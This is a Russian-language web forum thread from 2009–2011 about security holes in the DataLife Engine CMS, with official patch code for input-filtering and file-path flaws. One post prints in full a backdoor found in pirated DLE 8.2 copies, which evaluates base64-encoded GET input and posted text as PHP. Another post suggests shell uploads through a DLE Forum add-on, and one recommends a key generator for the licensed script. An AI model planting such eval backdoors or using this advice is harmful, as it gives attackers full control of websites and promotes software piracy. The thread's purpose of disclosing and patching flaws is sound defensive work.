Бормотухи.НЕТ

Вернуться   Бормотухи.НЕТ > Web-мастеру > DataLife Engine > Инструкции, модификации и статьи для DLE
Расширенный поиск

Инструкции, модификации и статьи для DLE Сборник инструкции, модов и статей по движку DataLife Engine

Ответ
 
Опции темы Поиск в этой теме
Старый 15.11.2009, 13:44 Вверх   #1
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
Восклицание Уязвимости в DLE (Затыкаем дырки)

Я думаю что вопрос безопасности в скрипте DLE довольно актуален, т.к. движок имеет очень широкое распространение. Тема создана для вэб -мастеров, а не для засрацев, которые используют чужие ошибки.
  Ответить с цитированием
Cказали cпасибо:
Старый 15.11.2009, 13:53 Вверх   #2
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
Хорошо Уязвимость DataLife Engine 8.2

Уязвимость DataLife Engine 8.2

Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля.
Степень опасности: Очень высокая

Злоумышленник может получить логин и пароль через модуль восстановления пароля.

Как получают пароль:

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 500 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.



Для решения проблемы администраторам рекомендуется обновить скрипт до 8.3. Следует так же учесть что в версии 8.3 изменяются некоторые шаблоны. Все изменения в удобном виде можно просмотреть на официальном сайте ВОТ ТУТ.

Для тех кто не хочет обновлять версию скрипта официальный производитель предлагает скачать патч. Скачать его можно ВОТ ТУТ или из вложения к этому сообщению.
Вложения
Тип файла: zip dle82_path.zip (2.3 Кб, 11 просмотров)
  Ответить с цитированием
3 пользователя(ей) сказали cпасибо:
Старый 15.11.2009, 13:54 Вверх   #3
Web Master
 
Аватар для lyapish
lyapish вне форума
Доп. информация
По умолчанию

DLE 8.2 нулл от мид-тим весь в дырках..

1)
Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля.

Ошибка в версии: только 8.2, версии ниже 8.2, а также актуальная версия 8.3 данной уязвимости не подвержены

Степень опасности: Очень высокая

Замените файл => dle82_path.zip

2)
На днях появилась информация, что нуленные движки (скачанные c dle.in.ua, с других хз) dle8.2 содержат бэкдор в файле engine/ajax/updates.php eval() через $_POST.

Код:
if($_GET['wert']==''){ 
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; 
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; 
@header("HTTP/1.0 200 OK"); 
@header("HTTP/1.1 200 OK"); 
@header("Cache-Control: no-cache, must-revalidate, max-age=0"); 
@header("Expires: 0"); 
@header("Pragma: no-cache"); 
@header("Content-type: text/css; charset=".$config['charset']); 
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']); 
if (!strlen($data)) echo $lang['no_update']; else echo $data; 
}else{ 
$file=(ROOT_DIR."/engine/classes/mysql.class.php"); 
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";} 
$file=(ROOT_DIR."/engine/data/dbconfig.php"); 
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";} 
$file=(ROOT_DIR."/engine/data/config.php"); 
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";} 
eval(base64_decode($_GET['user_id'])); 
echo <<<HTML 
<HTML><body><form action="" method="post"> 
<center><textarea name="text" rows="10" cols="100"></textarea> 
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML> 
HTML; 
if($_POST['text']!=''){eval(stripcslashes($_POST['text'])); 
}}
Заменить файл => updates.rar
  Ответить с цитированием
2 пользователя(ей) сказали cпасибо:
Старый 16.11.2009, 03:07 Вверх   #4
Fedoraвод
 
Аватар для Злой
Злой вне форума
Доп. информация
По умолчанию

Эх серега, такую дырку спалил, яж те по секрету, а ты всему свету (шутка конечно)
Но есть у меня еще парочка секретов, так что, не советую серьёзные проекты хостить на дле, уж слишком много в них дырок.


Serberg:
Да уж, секрет ))) Просто внимания на эту писанину не обратил, пока не увидел что у меня та же ботва ).

Естати, вот еще набор уязвимостей:

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 600 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

Последний раз редактировалось Serberg; 16.11.2009 в 16:26..
  Ответить с цитированием
Cказали cпасибо:
Старый 16.11.2009, 12:37 Вверх   #5
.:V.I.P.:.
 
Аватар для Lifeline
Lifeline вне форума
Доп. информация
По умолчанию

Как вариант взять лицензионный скрипт DLE, мне дал его один знакомый. А ключ с генерируете генератором ключей.


Скачать

Последний раз редактировалось Serberg; 16.11.2009 в 16:30..
  Ответить с цитированием
Cказали cпасибо:
Старый 05.12.2009, 21:27 Вверх   #6
Новичок
 
Аватар для gr33n
gr33n вне форума
Доп. информация
По умолчанию

Даже если "плохому дяде" удастся получить доступ к админке, шелл залить не получится, т.к. в папке загрузки файлов лежит .htaccess который не даёт работать php(и не только). Шелл получится залить если установлен DLE Forum. Это так, для заметки.
  Ответить с цитированием
Cказали cпасибо:
Старый 07.02.2011, 11:51 Вверх   #7
::.V.I.P.::
 
Аватар для boxx
boxx вне форума
Доп. информация
Хорошо Недостаточная фильтрация входящих данных

Недостаточная фильтрация входящих данных

Ошибка в версии: 9.0 и все более ранние версии
Степень опасности: Высокая

Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:

PHP код:
$count_result 0
ниже добавьте:

PHP код:
$sql_count ""
Откройте файл engine/inc/templates.php и найдите:

PHP код:
$allow_save false
ниже добавьте:

PHP код:
$_REQUEST['do_template'] = trimtotranslit($_REQUEST['do_template'], falsefalse) );

$_REQUEST['do_language'] = trimtotranslit($_REQUEST['do_language'], falsefalse) ); 
Либо просто скачайте и скопируйте на свой сервер патч для версии 9.0: http://dle-news.ru/files/dle90_path.zip, изменения для более старых версий скрипта, вносятся вручную, как указано выше.

Источник: dle-news.ru

Последний раз редактировалось Serberg; 16.02.2011 в 19:44..
  Ответить с цитированием
2 пользователя(ей) сказали cпасибо:
Старый 16.02.2011, 19:46 Вверх   #8
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
Хорошо Недостаточная фильтрация входящих данных

Недостаточная фильтрация входящих данных

Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта.

Ошибка в версии: 7.x - 8.5

Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте)

Для исправления откройте файл engine/inc/files.php и найдите:

PHP код:
$serverfile trimhtmlspecialcharsstrip_tags$_POST['serverfile'] ) ) ); 
замените на:

PHP код:
 if ($member_id['user_group'] == 1$serverfile trimhtmlspecialcharsstrip_tags$_POST['serverfile'] ) ) ); else $serverfile '';

        if ( 
$serverfile != '' ) {

            
$serverfile str_replace"\\""/"$serverfile );
            
$serverfile str_replace".."""$serverfile );
            
$serverfile str_replace"/"""$serverfile );
            
$serverfile_arr explode"."$serverfile );
            
$type totranslitend$serverfile_arr ) );
            
$curr_key key$serverfile_arr );
            unset( 
$serverfile_arr[$curr_key] );

            if ( 
in_arraystrtolower$type ), $allowed_files ) ) 
                
$serverfile totranslitimplode"."$serverfile_arr ) ) . "." $type
            else 
$serverfile '';

        }

        if( 
$serverfile == ".htaccess") die("Hacking attempt!"); 
Откройте файл engine/classes/thumb.class.php и найдите:

PHP код:
$this->img['des'] = imagecreatetruecolor$this->img['lebar_thumb'], $this->img['tinggi_thumb'] ); 
и добавьте выше:

PHP код:
        if ($this->img['lebar_thumb'] < $this->img['lebar_thumb'] = 1;
        if (
$this->img['tinggi_thumb'] < $this->img['tinggi_thumb'] = 1
взял тут
  Ответить с цитированием
2 пользователя(ей) сказали cпасибо:
Старый 21.12.2011, 00:49 Вверх   #9
Знаток
 
Аватар для Forum Bot
Forum Bot вне форума
Доп. информация
По умолчанию Перемещение темы

Тема была перенесена в раздел DataLife Engine.

Тему перенес: Serberg
  Ответить с цитированием
Ответ

Метки
shell dle, дыры в dle, уязвимости

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости форумов Vbulletin shadowvlad vBulletin 3.х 2 26.02.2009 14:17


Текущее время: 19:38. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc. Перевод: zCarot
 

Время генерации страницы 0.13104 секунды с 13 запросами